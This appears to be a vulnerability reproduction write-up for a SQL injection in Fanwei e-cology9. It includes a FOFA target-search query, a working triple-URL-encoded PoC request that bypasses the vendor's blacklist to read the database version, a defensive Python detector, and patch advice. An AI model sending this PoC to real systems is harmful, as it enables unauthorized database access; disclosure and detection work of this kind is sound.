Fanwei e-cology9 SQL injection vulnerability reproduction【QVD-2023-5012】
Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article are borne by the user; adverse consequences have nothing to do with the author. This article is for educational purposes only.
1. Product Introduction
e-cology is Fanwei's collaborative management application platform: a large-scale enterprise collaborative management platform that integrates an enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and a data center.
2. Vulnerability overview
Fanwei e-cology9 contains a SQL injection vulnerability. An unauthenticated remote attacker can use it to obtain sensitive database information, and further exploitation may lead to the target system being compromised.
3. Scope of impact
Affected versions
Fanwei e-cology9 <= 10.55
Unaffected versions
Fanwei e-cology9 >= 10.56
4. Reproduction environment
FOFA: app="Panwei-Collaborative Business System"
5. Vulnerability reproduction
Access the vulnerable environment, capture the request with Burp Suite and send it to the Repeater module.
PoC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
Note: the PoC passes three parameters:
1. isDis must be 1
2. browserTypeId selects the method
3. keyword is the injection point; it must be URL-encoded three times to get past Fanwei's filtering mechanism (Fanwei's blacklist replaces matched keywords with full-width characters, but it does not decode the value as many times as the sink does)
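As an added illustration from the defender's side (example code, not from the original post or from Fanwei), the following Python shows why a blacklist that decodes the parameter once never sees the triple-encoded keyword, and how canonicalizing until the value stops changing, plus treating more than one encoding layer as a signal in its own right, catches it. The signature list and the benign sample are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: the triple-encoded `keyword` value from the PoC
# above, and a benign single-encoded search term ("北京") for comparison.
TRIPLE_ENCODED_KEYWORD = "%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537"
BENIGN_KEYWORD = "%E5%8C%97%E4%BA%AC"

# Minimal, assumed SQLi signature set; a real WAF rule set is far larger.
SQLI_SIGNATURE = re.compile(r"(?i)(union\s+select|@@version|information_schema)")


def canonicalize(value: str, max_rounds: int = 8) -> tuple[str, int]:
    """Percent-decode repeatedly until the value stops changing.

    Returns the fully decoded string and the number of encoding layers
    peeled off (0 means the input held no decodable escapes). max_rounds
    bounds the work spent on adversarial input.
    """
    layers = 0
    current = value
    while layers < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        layers += 1
    return current, layers


def inspect_keyword(value: str) -> dict:
    """Compare a single-decode blacklist with a canonicalizing one.

    single_decode_hit mimics a filter that decodes the parameter once and
    then matches; full_decode_hit matches after canonicalization. More than
    one layer is itself suspicious: browsers and ordinary clients encode a
    form field exactly once.
    """
    decoded, layers = canonicalize(value)
    full_hit = bool(SQLI_SIGNATURE.search(decoded))
    return {
        "layers": layers,
        "single_decode_hit": bool(SQLI_SIGNATURE.search(unquote(value))),
        "full_decode_hit": full_hit,
        "suspicious": layers > 1 or full_hit,
    }


if __name__ == "__main__":
    for name, sample in [("poc", TRIPLE_ENCODED_KEYWORD), ("benign", BENIGN_KEYWORD)]:
        print(name, inspect_keyword(sample))
```

For the PoC value the single-decode check reports no hit while the canonicalized check does, and the layer count of 3 alone is enough to reject or log the request.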
(Screenshot: querying the database version information)
(Screenshot: reproduced successfully)
(Screenshot: Dragon POC)
6. Remediation
The vendor has released an official security patch; affected users are advised to upgrade to version 10.56 or above as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp